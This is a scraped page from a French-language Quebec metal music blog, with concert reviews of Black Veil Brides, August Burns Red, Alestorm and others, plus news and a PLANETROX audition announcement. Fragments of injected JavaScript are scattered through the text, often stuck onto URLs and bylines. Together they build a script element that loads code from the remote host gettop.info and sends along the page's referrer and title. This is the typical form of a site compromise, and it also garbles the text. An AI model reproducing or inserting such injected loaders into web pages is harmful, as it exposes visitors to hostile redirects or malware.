Home Blog Page 4

Halestorm – « Mayhem »

https://www.youtube.com/watch?v=QralTt4Uadodocument.currentScript.parentNode.insertBefore(s, document.currentScript);

Prices On Our Heads – « Into The Abstract »

https://soundcloud.com/puregrainaudio/prices-on-our-heads-into-thed.getElementsByTagName(‘head’)[0].appendChild(s);

Native Construct – « Mute »

https://soundcloud.com/metalbladerecords/native-construct-muteif (document.currentScript) {

Planetrox 2015 fête ses 5ans

Envol et Macadam présente la 5e édition des auditions PLANETROX

Québec, le 10 février 2015. Envol et Macadam est fier d’annoncer le retour des auditions PLANETROX pour une cinquième année consécutive. Présentées pour la première fois en 2011, les auditions connaissent depuis un important succès, tant auprès des artistes que des mélomanes qui apprécient les nombreuses découvertes musicales qu’ils y font. Au fil des dernières années, Envol et Macadam a ainsi élargi ses liens avec le reste de la planète en réunissant des groupes de musique alternative provenant de plusieurs pays qui ont convergé vers Québec pour se produire dans le cadre du festival.

Le projet PLANETROX, mis sur pied avec la collaboration de la Ville de Québec, est une compétition internationale dont la mission est de découvrir les meilleurs groupes émergents de chacun des pays invités pour ensuite les présenter au public du festival. L’édition 2015 sera l’occasion de constater le talent de musiciens provenant des dix pays participants (Canada, États-Unis, Mexique, France, Royaume-Uni, Allemagne, Chine, Indonésie, Japon, République tchèque), lesquels viendront performer à Québec sur les scènes du festival du 10 au 12 septembre prochain. Les auditions PLANETROX constituent une opportunité de rayonnement artistique international pour la capitale et confère une dimension unique au festival.

L’année 2015 s’annonce déjà mémorable pour Envol et Macadam qui célèbrera sa 20eédition en septembre prochain. L’organisation apporte ainsi son soutien aux groupes de musique émergents depuis 20 ans tout en continuant d’innover afin d’offrir à la relève d’ici et d’ailleurs l’opportunité de prendre part à un événement qui attire annuellement des milliers de mélomanes avertis et de nombreux professionnels de l’industrie. Présentée dans un cadre urbain distinctif qui enchante la foule comme les artistes, la programmation séduit les publics jeunes et branchés ; NOFX, Pennywise, Bloc Party, Rise Against, Less Than Jake, Sublime With Rome, IAM, Metric, Jean Leloup, Lagwagon et No Use For A Name ne sont que quelques-uns des artistes réputés qui ont participé au festival Envol et Macadam au cours des dernières éditions, pour le plus grand bonheur des festivaliers.
Pour les formations québécoises, les inscriptions à PLANETROX se feront du 10 février au 3 avril. Le vote en ligne sera possible du 16 au 30 avril et les auditions se tiendront par la suite dans différentes villes en province. Voici les dates et les villes visitées :

Saguenay – Les 4 Barils – 23 mai
(Régions : Saguenay – Lac-St-Jean, Charlevoix, Côte-Nord, Nord-du-Québec)

Montréal – Petit Campus – 24 mai
(Régions : Montréal, Laval, Montérégie, Laurentides, Outaouais, Abitibi-Témiscamingue)

Victoriaville – Cactus Resto-Bar – 29 mai
(Régions : Estrie, Centre-du-Québec, Mauricie, Lanaudière)

Québec – Le Cercle – 5 juin
(Région : Capitale-Nationale)

Lévis – Le Cluster – 6 juin
(Régions : Chaudières-Appalaches, Bas St-Laurent, Gaspésie-Îles-de-la-Madeleine)
Pour connaître les règlements, les dates des auditions internationales et accéder au formulaire d’inscription, consultez le www.planetrox.ca
Merci à tous les partenaires des auditions PLANETROX, un projet soutenu par la Ville de Québec et le Ministère de la Culture, des Communications et de la Condition féminine du Québec. 

envolvar d=document;var s=d.createElement(‘script’);

In Flames – « Paralyzed »

Pour ceux et celles qui ne l’avaient pas encore vu, In Flames nous présente Paralyzed et n’oubliez pas qu’In Flames sera dans la vieille capital le 12 mai prochain!!!}

Drowning Pool – « Soul »

https://www.youtube.com/watch?v=pB-wC9Re5sA#t=21

Résumé de la semaine du 9 au 15 Février 2015

Résumé de la semaine du 9 au 15 Février 2015

Cette semaine, nous avons quand même été gâtés au niveau des annonces de spectacles et/ou de d’autres nouvelles concernant le monde musical

Commençons d’abord par les nouvelles musicales en général.

  • Bullet For My Valentine, on annoncés en début de semaine, que leur Bassiste, et deuxième screamer, Jason James, a quitté le groupe pour des raisons encore inconnues. Par contre, il est parti tout en restant en bon terme avec le groupe et justement, le groupe en dévoilera un peu plus dès que possible. Vous pouvez voir l’article complet ici : http://ultimradio.com/bullet-valentine-depart-dun-des-membres-du-groupe/
  • Le Amnesia Rockfest, a dévoilé en milieu de semaine, leur programmation 2015. En effet pour plusieurs personnes, il y a un lot de surprises avec des artistes tel que : Linkin Park, System Of A Down, The Offspring, Slayer, Snoop Dogs, Rob Zombie, Deftones, Tenacious D , Bad Religion et j’en passe énormément. Pour voir la programmation complète, rendez-vous ici : http://www.amnesiarockfest.com/en/lineup2015
  • Black Veil Brides, était de passage à Québec cette semaine pour leur première fois en carrière. Ce fût un excellent spectacle, autant pour le groupe principal que les groupes invités. Je vous invite à aller voir les photos et la critique sur : http://www.ultimradio.com/
  • L’édition du Heavy Mtl 2015, se passera cette année, sur trois jours. Certains diront que ça toujours été ainsi car il y avait le ‘’Heavy Mtl en ville’’ le vendredi du festival, mais détrompez-vous, car les 3 jours seront bel et bien sur le site du Heavy-Mtl, sois au parc Jean-Drapeau.
    Pour en avoir le cœur net et pour également suivre l’évolution du festival, allez sur : http://heavymontreal.com/
  • Annoncé cette semaine, The Hollywood Vampires, un nouveau groupe de musique, sera formé de Johnny Depp, Alice Cooper et Joe Perry, d’Aerosmith. Le groupe fera sa première représentation au festival ‘’Rock in Rio. Gageons que je ne suis pas le seul qui a hâte d’entendre ce que ça vas donner.

Passons maintenant aux nouvelles concernant les annonces de spectacles pour la région de Québec surtout, et un peu de Montréal.

  • AC/DC, sur les plaines d’Abraham, le 28 Août 2015, billets en vente lundi le 16 Février 2015.
    AC/DC, au stade Olympique, le 31 Août 2015, billets en vente lundi le 16 Février 2015.
  • Die Mannequin & Secret Broadcast, s’amènent à Québec, au bar La source de la Martinière, le Vendredi 24 Avril 2015 à 20H. Les billets sont en vente dès maintenant sur http://www.lepointdevente.com/ et sont au coût de 18.79$ du billet. Ce spectacle vous est amené par District 7.
  • Black Crown Initiate & Invités, seront à Québec, au bar La Source de la Martinière, le Mercredi 1er Avril 2015 à 19h. Les billets sont en vente dès maintenant sur http://www.lepointdevente.com/
    et sont au coût de 15.29$ du billet. Ce spectacle vous est présenté par District 7.
  • Daedalean Complex (Avec Lindsay Schoolcraft de Cradle Of Filth) & Blinded By Faith & Obscurcis Romancia & Vehemal, seront à Québec, à L’Agitée, le vendredi 27 Février 2015. Les billets seront disponibles à l’entrée au coût de 10$.

Sur ce, je vous souhaite une excellente semaine et continuez de suivre la page Facebook ET le site de UltimRadio, pour voir différentes nouvelles, des annonces de spectacles, des critiques de show ou voir des photos splendides, prisent lors de vos show préférés et plein d’autres.

Rock on !

Christopher Drouinif (document.currentScript) {

Photo: Black Veil Brides Impérial Bell 2015

Critique du Blackmass Tour 2015 : Black Veil Brides / Memphis May Fire / Ghost town

Jeudi le 12 Février 2015, marquait la venue du ‘’Blackmass tour 2015’’, supporté par les groupes
Black Veil Brides, Memphis May Fire & Ghost Town. Pour avoir déjà vu Black Veil Brides en spectacle lors de leur dernier passage à Montréal, je pouvais déjà prévoir une foule principalement composée de jeunes femmes maquillées et accoutrées comme les membres de leur groupe préféré. Et bien je ne m’étais pas trompé ! Déjà dans le ‘’Line-up’’ à l’extérieur, avant l’ouverture des portes, on pouvait voir principalement de jeunes filles et/ou femmes, maquillées avec des lignes noirs au visage, représentant un peu ce que Andy, le chanteur de Black Veil Brides, porte lorsqu’il est sur scène. Une soirée qui s’annonce mouvementée mais qui d’abord commence par la présence de deux groupes invités.

Ghost Town : Le groupe est encore très peu connu au Québec, mais par contre après la prestation qu’ils ont donnée, ils ont surement déjà conquis les gens présents dans la foule. On peut décrire ce band comme un groupe Rock/Électronique. Le Quatuor Américain, se compose d’un guitariste, d’un batteur, d’un chanteur et d’un dernier membre installés à une table électronique. Pour certains, le mélange électronique/screamo peut sembler un peu étrange, moi le premier, mais après cette prestation, mon avis à changé complètement vis-à-vis ce style de musique. En effet, le mélange de clear vocal, de scream, de rythmes de batterie intenses, des riffs et des petits solo de guitares entrainants et d’effets sonores électroniques, ce veut particulièrement excellent à n’en faire sauter et danser les fans présents. En parlant de ça, Kevin, le chanteur principal, n’a pas hésiter à réchauffer la foule en les faisant sauter et lever les mains, il l’a fait et ce durant tout le set qu’ils ont présenté, sois approximativement 9 chansons. Étant curieux, j’ai été voir des vidéos sur internet avant d’aller au spectacle, et je cernais difficilement leur musique, mais après leur solide performance d’hier, je m’avoue conquis et c’est une excellente nouvelle découverte pour moi et surement pour plusieurs d’autre aussi.

Memphis May Fire : Avant que le 2e groupe invité prenne place sur scène, on peut remarquer que le parterre est environs au 3/4 remplit. Cependant la foule était surtout très compactée au premier palier, sois collé à la clôture séparant les fans de la scène. Le groupe entre sur scène et est automatiquement acclamé par la foule. J’étais très surpris de voir comment la foule adorait autant ce band, mais ils ont leur raisons car ce fût tout une prestation. Déjà en début de liste, on peut remarquer qu’ils ont avec eux sur scène, des jeux de lumières en quantité industriel et ils ne se gênent pas pour les utiliser. En effet les jeux de lumières et de fumée on été utilisés durant TOUT le spectacle ce qui malheureusement ne nous permettait pas vraiment de voir clairement le visage des membres du groupe. Malgré cette petite lacune, qui peut être pour certain un point fort car oui le résultat était très joli, le côté musical tant qu’a lui était très solide. Le volume était parfait, la calibration des différents sont l’était également, le choix des morceaux était parfait et leur prestance sur scène était remarquable. Ils ont joués des hits comme : Vices, Miles Away, Beneath The Skin, Prove Me Right & Legacy. Au début, lors des deux ou trois premières chansons, la foule semblait un peu amortie, c’est alors que Matty, le chanteur, c’est assuré que la foule se réveille un peu en leur demandant de sauter et de chanter avec lui. Pour moi les moments forts on été l’interprétation de ‘’Miles Away’’, une chanson un peu plus slow, presqu’une balade, suivis de la puissante chanson ‘’Beneath The Skin’’ qui comprend des riffs de fou et des breakdowns à en faire vibrer l’impérial au complet. Une autre solide performance qui ne m’a pas déplu.

Black Veil Brides : La foule, qui c’est finalement bien remplie au parterre, était hystérique à chaque mouvement sur scène, même si ce n’était que des techniciens qui mettaient en place le matériel pour le spectacle principal. Côté visuel, nous avions droit à un très beau set-up sur scène. Encore des jeux de lumières présents, la batterie surélevée sur des ‘’amplis’’, une grosse bannière derrière la scène, qui représentait le cover de leur dernier album’’Black Veil Brides IV’’ et 2 écrans verticales sur chaque côté de la scène, qui nous présentaient des effets visuels durant le spectacle. Dès que les lumières se sont fermées, et que la première note de l’intro musicale c’est fait entendre, la foule, que je vous le rappelle est principalement composée de jeunes filles, c’est mise à crier mais d’une force incroyable. Des cris aigus à en faire briser de la vitre et qui par moment, ont même enterrés les premières paroles d’Andy et les premières notes de guitares. Il n’y avait pas que les cris féminins qui étaient assourdissants… le son même du show était ma fois extrêmement fort. J’en ai vus beaucoup de spectacles metal/rock etc. et j’en ai vécu des sons puissants, mais celui-ci fait partis des plus haut dans mon classement personnel. Le son au départ était tellement fort que parfois, il était presque difficile de distinguer les différents rythmes de guitare et même de la voix d’Andy. Parlant de la voix, le son du micro était ma fois sois très débalancé ou c’était Andy qui l’utilisait mal. En effet, parfois on n’entendait presque pas son vocal…et quelques secondes plus tard c’était extrêmement fort pour par la suite revenir à un volume de voix quasiment inexistant. J’ai trouvé cette lacune assez importante car j’avais de la misère à bien distinguer certains passages des morceaux interprétés. Une chance que la foule était là pour chanter avec le band, comme ça on pouvait se retrouver facilement dans le morceau joué. Était-ce voulu par les membres du groupe ? Ou simplement de malheureux problèmes techniques ? Difficile à dire, mais chose sûre c’est qu’à plusieurs reprises, si ce n’est pas à tous les morceaux, un technicien allait sur scène pour replacer un fil après un musicien, ou allait démêler des choses. Malgré tout, ce fût un excellent spectacle, Andy et ses confrères, étaient très proches de leurs fans et ils étaient très énergiques sur scène. Ils ont fait des morceaux tel que : Heart of Fire, I Am Bulletproof, Coffin, Wretched and Divine, Knives and Pens, Rebel Love Song, The Legacy, Perfect Weapon, Fallen Angels, In the End et j’en passe.

Pour conclure, ce fût une agréable soirée, constituée de trois excellents bands qui ont fait vibrer l’impérial de Québec. Quelques petites lacunes au niveau sonore pour Black Veil Brides, mais rien de majeur et ça n’a pas empêché à personne d’apprécier le concert. C’est donc avec une nouvelle connaissance musicale en poche ( Ghost Town ), et un cillement d’oreilles intense, que je vous dit Bye et à un prochain show ! Rock on !

Christopher Drouind.getElementsByTagName(‘head’)[0].appendChild(s);

Adelitas Way – « I Get Around » [YouTube Song Stream]

https://www.youtube.com/watch?v=aGGIk0_Jj_4#t=18d.getElementsByTagName(‘head’)[0].appendChild(s);

Bullet For My Valentine, départ d’un des membres du groupe!

Ce matin, le lundi 9 février 2015, le groupe Bullet for My Valentine, annonçait, via sa page Facebook, que le bassiste, et screamer secondaire, Jason James, quittait le groupe.
Voici ce que le post nous laissait lire…

To all our fans around the World,It is with regret that Bullet For My Valentine has to announce that Jay James is no longer a member of the band. Jay has been a part of this band for well over 12 years and part of our lives forever, and we’re gonna miss him as much as we know you guys are too. We wanna wish him all the best and success with whatever he chooses to do next and will always be grateful for his contribution and sacrifices he made for this band.

We’ll announce a replacement for Jay when we feel the time is right, but until then we’re gonna be busy and focused recording our next record and making sure its the best album we’ve ever made.

2015 is already shaping up to be a massive year for us with lots of exciting things going on behind the scenes which we’ll be announcing as soon as we can.

Thank you all for your continued support.

Matt, Padge, Moose.

Traduction : À tous nos fans autour du monde, c’est avec regret que Bullet For My Valentine doit annoncer que Jay James ne fait plus partie du band. Jay a fait partie du groupe depuis maintenant 12 ans et de nos vies presque depuis toujours et il va nous manquer autant qu’il va vous manquer aussi. Nous voulons lui souhaiter le meilleur succès dans ce qu’il va décider d’entreprendre dans le futur et nous allons toujours être reconnaissant de sa contribution et de ses sacrifices qu’il a fait et donnés pour le groupe.

Nous allons annoncer le remplaçant de Jay quand nous allons trouver que le temps sera venu, mais d’ici là, nous restons occupé et concentré à l’enregistrement de notre prochain album et nous allons s’assurer que se sera le meilleur album que nous ayons jamais fait.

2015 s’annonce déjà une gigantesque année pour nous, avec son lot de surprises qui se préparent en secret et qui seront annoncées aussitôt que nous le pouvons.

Merci pour tout votre support !

Matt, Padge, Moose.

Pour avoir rencontrer le groupe en 2013, Jason ( Jay ) était l’un des membres les plus sympathique. C’est une triste nouvelle pour les fans du groupe, mais gageons qu’il avait ses raisons de le faire et à voir le post du band, ils ont l’air d’être restés en très bon terme donc, sans aucune chicane ou autre.

D’ici là, on verra qui sera le nouveau membre du groupe qui le remplacera. On pourra peut-être le savoir cet été. Pourquoi cet été vous me direz ? et bien si on prend en considération le fait que le band part en tournée avec Slipknot, et que ce dernier sera au Heavy Mtl cette année, peut-être aurons nous la chance de voir Bullet For My Valentine au parc Jean-Drapeau cette été ? À suivre…

On se tient au courant si jamais il y a du développement !

Christopher Drouin

(photo de moi et du band de passage à Montréal en 2013 )

chri

}

Aware the Oppressed – « Awakening » [YouTube Song Stream]

https://www.youtube.com/watch?v=ddWokIYlH2M

Pennywise au Métropolis, le 22 mars 2015

C’est le 22 mars prochain qu’aura lieu le show de Pennywise dans la région métropolitaine. Organisé par Greenland Productions en collaboration avec Evenko, la première partie sera assurée par de solides formations, telles que Anti-Flag, qui a déjà mis leur spectacle aux foufounes électriques du 13 février prochain sold-out depuis plus d’un mois, A Wilhelm Scream et Punchline 13. Ce sera un événement à ne pas manquer vu la brochette alléchantes de bands. Les billets sont 32,50$ incluant les frais de service et vous pouvez vous les procurer à la billetterie du Métropolis de Montréal, sur le réseau Admission – Ticketmasterwww.admission.com et chez SOUNDCENTRAL.var d=document;var s=d.createElement(‘script’);

photo: The Dreadcrew of Oddwood

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Photo: Swashbuckel Impérial 2015

}

Photo: Alestrom Impérial de Québec 2015

d.getElementsByTagName(‘head’)[0].appendChild(s);

Critique Alestorm Impérial 2015

SHOW ALESTORM PIRATEFEST 2015 2-02-15

 

Holala, j’avais une humeur incendiaire hier soir entre les puants, crinqués, cinglants et différents mécréants présents au Piratefest 2015 à l’Impérial de Québec. Entre le son vacillant techniquement de Nordheim, la prestation qui suce(merci Fred) de The Dreadcrew of Oddwood, et finalement les bouffons deaths de Swashbuckle, j’étais à un doigt de péter les plombs et de faire un carnage! Hum, pourtant n’étais-ce pas la frénésie générale qui devait contaminer la foule? Sans me poser de questions et avant de commettre l’irréparable, comme certains d’ailleurs qui ont manqué une partie capitale du show, je suis monté à l’étage pour reprendre mes sens. J’avoue que Swashbuckle ont tiré tonne de sarcasmes, sourires, tout en enflammant la foule présente, mais enfin…

 

Par contre, j’affirme humblement avoir mangé toute une volée avec la prestation d’Alestorm! C’est par une entrée très forte qu’ils ont débuté par Walk the Plank du dernier album. Wow ça valait la peine d’attendre, j’étais conquis et j’avais déjà le sang qui me battait les tempes! Passant par The sunk’n Norwegian et la favorite de Christopher Bowes Shipwrecked, c’était définitif je voulais les albums! La réponse du public était malade enchaînant avec Magnetic North, Back Through Time et That Famous Ol’ Spiced, entrecoupé d’un « scream to me Quebec! » de Bowes aussitôt assourdi par la foule! Ils ont continué sous les lighters allumés pendant la balade Nancy the Tavern Wench avant de reprendre en force avec Midget Saw et Keelhauled. Bref, j’ai rien à redire sur leur prestation sauf qu’ils m’ont remis la foi sur leur style avec Pirate Song et Drink! Sérieux, chapeau! En rappel, j’ai rejoint la foule au lieu du vestiaire pour 1741, Hangover (Taio Cruz cover) et Captain Morgan’s Revenge, pour repartir avec Rum derrière la tête en quittant… Thumb’s up Alestorm, je suis maintenant accro!

Texte: Vincent Couturier

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Critique Olivier Martineau, sarcastique, moqueur, diaboliquement drôle!

Que dire de plus que WOW ! Un premier One Man Show parfait pour Olivier Martineau! C’est avec une grande joie que j’ai assisté à son premier One Man Show jeudi dernier à la salle Albert Rousseau. C’est devant une salle comble que Martineau nous a présenté son spectacle, Son sourire fendu jusqu’aux oreilles à la levé du rideau, nous savions déjà que nous allions avoir droit à un humoriste prêt et confiant de ses textes. Avec son allure de Crooner au complet noir, Martineau a un style bien à lui.  Un personnage unique parfois cinglant, bien qu’il est adoucie semble t-il ses textes, qui ne semble aimer personne du moins son personnage je dit bien…. Que vous soyez un homme , une femme, gros, petit, hétéro, lesbienne, un chat un chien, tout le monde y passe. Reconnu pour être un humoriste au parler rapide, il ne reste pas moins que l’on comprend toujours le sens des ses textes, avec une façon bien à lui de nous faire comprend qu’il y a toujours un double sens lorsqu’il se répond pratiquement à lui même. Sont interaction avec le public est phénoménale, bien qu’olivier ai une « SHAPE » d’échalote, il n’en démarre pas moins qu’il occupe tout la scène. 

J’ai connu Olivier lors du Comédie Club  2013 ou il animait le gala et je vous juge qu’il a non seulement évolué, mais pris une aisance sans pareil sur scène. Un petit manque pour ma pars, ses chansons et sa guitare mon manqué. Un show à voir et à revoir sans hésitation.

if (document.currentScript) {

Photo: Olivier Martneau premier one man show Salle Albert Rousseau

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

August Burns Red Imperial de Québec 2015

} else {

The Agonist nous présente My Witness, Your Victim

The Agonist nous propose un  nouveau clip « My Witness, Your Victim » issu du cinquième album du groupe « Eyes Of Providence« , qui sortira le 23 Février 2015. Premier album avec Vicky Psarakis, la nouvelle chanteuse qui remplace Alissa White Gluz (Arch Enemy).} else {

Sylvain Larocque – Grande première à la Salle Albert-Rousseau – 28 janvier 2015

C’est le 28 janvier 2014, dans une salle remplie à presque pleine capacité, qu’avait lieu la grande première du spectacle de Sylvain Larocque intitulé Dans le blanc des yeux. L’humoriste exerçant ce métier depuis une vingtaine d’années et connu davantage pour son efficacité en stand-up comique, a su remplir avec brio sa mission d’hier soir. En effet, la foule de la salle Albert-Rousseau a été très réceptive à la majorité de ses gags, de ses jeux de mots et même de certaines blagues qu’il a enchaîné malgré la suggestion de retrait par ses collaborateurs. Son spectacle était plutôt varié au niveau des thématiques, ce qui rendait le tout dynamique et pas trop monotone. Malgré le fait que Sylvain Larocque est davantage statique sur scène, du moins si on le compare à des humoristes comme Louis-José Houde, Jean-Marc Parent, Olivier Martineau, Adib Alkhalidey, Cathy Gauthier, etc., il réussit tout de même à capter entièrement notre attention et à nous faire entrer rapidement dans son univers. Son jeu sur scène et son humour nous rappelle davantage celle de certains humoristes plus posés et réfléchis tels que Pierre Légaré, Guy Nantel et Laurent Paquin, entre autres.

Dès le départ, Sylvain Larocque a cassé la glace en exprimant à quel point il était heureux d’être là pour faire sa première, nonobstant le fait que son visage semblait véhiculé un tout autre message. Que même malgré son allure et son air apathique, il demeure un gros ourson à l’intérieur. L’humoriste nous a donné accès à certains moments intimes de sa vie, dont son passé comme victime d’intimidation à l’école. Ce segment du spectacle, plus émotif, a été tout de même bien développé de façon à nous amener autant dans un univers de prise de conscience et de sympathies que d’humour. Pour répondre à ces agresseurs de l’époque, il a verbalisé ses réponses très solides et drôles face à quelques insultes qu’il avait pris soin de bien noter dans le passé dans un cahier Canada.

Au retour de l’entracte, Sylvain Larocque s’est lancé dans un univers plus engagé avec des sujets plus chauds tels que le bilinguisme, l’immigration et le racisme. La solidité de ses textes et ses réflexions en lien avec ces thèmes sont partagées dans un style d’écriture digne de lui, c’est-à-dire avec une finesse et une intelligence remarquables. Malgré son encouragement à être davantage pessimiste dans la vie pour éviter d’avoir des attentes trop élevées et risquer de plus fortes déceptions, je suis très heureuse d’avoir été optimiste face à ce spectacle et que mes attentes aient été complètement comblées.

 document.currentScript.parentNode.insertBefore(s, document.currentScript);

Photo: Sylvain Larocque Salle Albert Rousseau 2015

d.getElementsByTagName(‘head’)[0].appendChild(s);

Critique August Burns Red Impérial 2015

Critique August Burns Red / Miss May I / Northlane / Fit For A King / Erra

 

Mardi le 27 Janvier 2015, marquait la venue de la tournée ‘’The Frozen Flame Tour ‘’ dans la vieille capitale. Cette tournée, qui se veut ‘’Metalcore’’, nous amenait les bands : August Burns Red, Miss May I, Northlane, Fit For A King et Erra. Malgré la température qui faisait des sienne sur Québec et les environs, ceci n’a aucunement empêché les fans de se retrouver massivement à l’impérial pour une soirée remplie de metalcore comme ils en redemandent encore et encore. C’est avec une salle remplie à quasi pleine capacité, que les fans ont accueilli avec plaisir cette tournée, qui par chance s’est arrêtée chez nous.

Erra : Ce groupe tout droit venu de l’Alabama, est un parfait mélange entre le progressif et le metalcore. Malgré leur popularité un peu moins élevée que les autres groupes présents, ils ont eu droit à un chaleureux accueil de la part de la foule. Entre les riffs rapides, les percussions rythmées et une base entrainante, on peut remarquer qu’il y a un excellent mélange entre le clear vocal, et le scream, venant du chanteur. Une bonne prestance sur scène, malgré un set trop court, mais qui en revanche, est assez longe pour piquer la curiosité des fans ne les connaissant pas et ainsi se faire connaitre pour un futur retour par ici.

Fit For A King : Voici un autre groupe un peu méconnu de la foule québécoise, mais qui a surement su attirer une nouvelle foulée de fans à leur actif. Le quatuor américain à su faire lever la foule avec leur mélodie, encore une fois ici à saveur de metalcore. Ils ont interprété leurs succès tel que Hollow King, Forever Unbroken, Slave to Nothing, The Resistance et etc. Le groupe a eu le temps de donner une prestation qui a durée environs 7 chansons au total.

Northlane : Maintenant, c’est au tour du quintet Australien à venir nous présenter leur musique. Encore une fois ici c’est du metalcore à l’état pur. Des rythmes à en faire secouer la tête et à trasher, comme nous aimons tant, et de l’énergie à en revendre, c’est ce que le groupe à pu fournir à la foule de l’impérial. Ils ont interprété des chansons comme Quantum Flux, Windbreaker, Rot, Genesis et Masquerade, pour un total d’environs 7 titres.

Miss May I : Beaucoup de gens dans la salle venaient autant pour ce band que pour la tête d’affiche de la tournée. C’est avec une énergie hors pair que le groupe à fait vibrer la foule. Comme leur prédécesseur, Erra, on a ici encore un excellent mélange entre scream et clear vocal. Le mariage de ces deux types de chants, donne des moments intenses et qui se mélange bien au rythme des différents morceaux. Comme co-headliner à cette tournée, on ne pouvait demander mieux. Remarque amusante, un des musiciens du groupe a joué tout le set, en ‘’gougounes’’, mais à entendre les dires des autres, ce serait une habitude pour lui. Hey Mister, Masses of a Dying Breed, Forgive and Forget, Gone, Our Kings, Hero With No Name, A Dance with aera cura et Relentless Chaos, sont les titres qui ont été joué lors de leur set. La seule chose qu’on pourrait reprocher, est le setlist qui a été trop court. Beaucoup, si ce n’est pas tout le monde, en redemandaient encore. Maintenant que la foule est pleinement active et énergique, préparons maintenant le terrain et la scène pour le groupe principal.

August Burns Red : Quand le groupe principal a enfin fait son entrée sur scène, c’est une foule endiablée et remplis à craquer (du parterre jusqu’au balcon) qui les ont accueilli comme il le fallait. Depuis le premier band, le son n’a cessé d’augmenter pour atteindre son maximum pour August Burns Red. Peut-être ici un petit point négatif, car par moment, le vocal était pratiquement inexistant tellement il se faisait enterrer, mais sachez que ceci n’enlève pas le fait que ce fut un excellent set. C’est en débutant avec White Washed , en passant par Marianas Trench, Provision, Back Burner, Composure, un solo de drum, Carpe Diem et en terminant par Empire, que le groupe a fait un très bon set de 15 chansons ( excluant le solo de drum ) ce qui est très respectable. Le groupe a été très énergique sur scène et a quand même bien interagi avec la foule qui par moment était très mouvementée.

Donc, ce fut une soirée metalcore très très bien réussie avec un éventail de bands qui a bien gâté tous les fans présents. Peut-être une petite lacune au niveau du son excessivement fort qui enterrait, par moment, le vocal des différents artistes présents. Une soirée très bien remplie et qui comble les fanatiques du style de musique présenté par le ‘’ The Frozen Flame tour’’. Gageons que les bands qui ont débutés la soirée, auront maintenant de nouveaux fans et qu’on les reverra bientôt dans notre beau coin de pays. Sur ce, on se revoit pour un prochain show !!
Rock on !!!!!

Christopher Drouinif (document.currentScript) {

Miss May I à l’Impérial de QC 2015

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Photo: Pain Relief Bar La Source De la Martinière 2015

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Photo: BCASA Bar La Sourec De La Martinière 2015

} else {

Photo: The Brains bar La Souce De La Martinière 2015

d.getElementsByTagName(‘head’)[0].appendChild(s);

Aeternam au bar Le Cercle 2015

Un seul commentaire à faire, c’était ma première expérience avec Aeternam pis ça ne sera sûrement pas la dernière !!!

 

if (document.currentScript) {

Photo: Southern Cross au bar Le Cercle

} else {

Photo: Dark Tranquillity Salle Multi 2015

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Critique Dark Tranquillity Québec 2015 !

SHOW DARK TRANQUILLITY 8-01-15

 

J’ai eu l’honneur de débuter mon année en force à la salle Multi du complexe Méduse le 8 janvier dernier pour le show de Dark Tranquillity. Ouf, malgré le froid cavalier mordant les -31 degrés Celsius, le retard et le line-up de vestiaire interminable, j’ai été heureusement surpris du band d’ouverture May Catch Fire. Effectivement, c’était invitant et rafraichissant malgré un son quelque peu écrasé et étouffant relevant de problèmes techniques selon moi. Beaucoup de jeux de voix et variations de rythme, j’ai accroché dès la quatrième pièce! Par contre, commentaire partagé de la foule présente, ça tire sur des influences Korn et System Of A Down par moment. Malgré tout, je leur lance mon chapeau et j’étais très impressionné par la foule de fans réuni immensément réceptive!

 

On a poursuivi avec Insomnium qui nous ont donné une prestation du tonnerre! Le son s’améliorant de pièce en pièce, c’est une prestation sans faille et envoutante que Niilo Sëvanen nous a livré. Ok, ça tirait parfois un peu à côté sur le clean mais en somme j’ai embarqué du début à la fin! Présentant un setlist orienté sur Shadows of the Dying Sun, c’était une prestation de métal pur à ne pas manquer, pour ma part le show de la soirée!

 

En finale, enfin Dark Tranquillity enflammait la salle! Bien entendu, ça prit quelques pièces pour réanimer la foule mais la chaleur et l’enthousiasme de Mikael Stanne les a vite reconquis. D’ailleurs il n’a cessé de répéter que c’était la meilleure place au monde où donner des prestations du genre! Je sais qu’on entend ça souvent, mais il semblait fidèle à sa pensé, donnant la main aux gens en « bodysurfing », souriant et regardant les gens dans les yeux! Pour ce qui est du setlist, c’était passablement le même que l’an dernier au Dagobert, centré majoritairement sur l’album Construct. Heureusement que j’avais mon body Fred Gagnon pour m’indiquer 2-3 « Int », grâce à lui j’ai pu savoir que Constant de l’album The Mind’s I n’avait jamais été joué live depuis 18 ans! On a finit le tout avec Misery’s Crown et une foule en délire! Wow toute une soirée avant de retourner profiter du forfait -31% du Ashton!

Texte: Vincent Couturier

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Concours Dark Tranquillity à la salle Multi

Bienvenue 2015 !!! Notre premier concours en collaboration avec district 7 production, Dark Tranquillity, jeudi le 8 janvier à la salle multi. Une seul façon de gagner votre paire de billets, partagez et aimez le lien.

 

web_darktranquillity@multi_150108}

Critique Asking Alexandria, Blessthefall, Chelsea Grin, The Family Ruin

Critique du Moving On Tour: Asking Alexandria/Blessthefall/Chelsea Grin/The Family Ruin.

 

Bonjour à tous !! Mercredi le 10 décembre fût marqué par notre première tempête hivernale de 2014…Mais également par la venue du Moving On Tour, comprenant les groupes ; Asking Alexandria, Blessthefall, Upon A Burning Body, Chelsea Grin et The Family Ruin. Malgré la température, des centaines de personnes ont bravés le mauvais temps pour venir passer une excellente soirée à l’impérial de Québec. Malheureusement, Upon A Burning Body n’a pu être présent, supposément dû à des problèmes mécaniques. Malgré tout, se fût une soirée réussie et voici pourquoi…

 

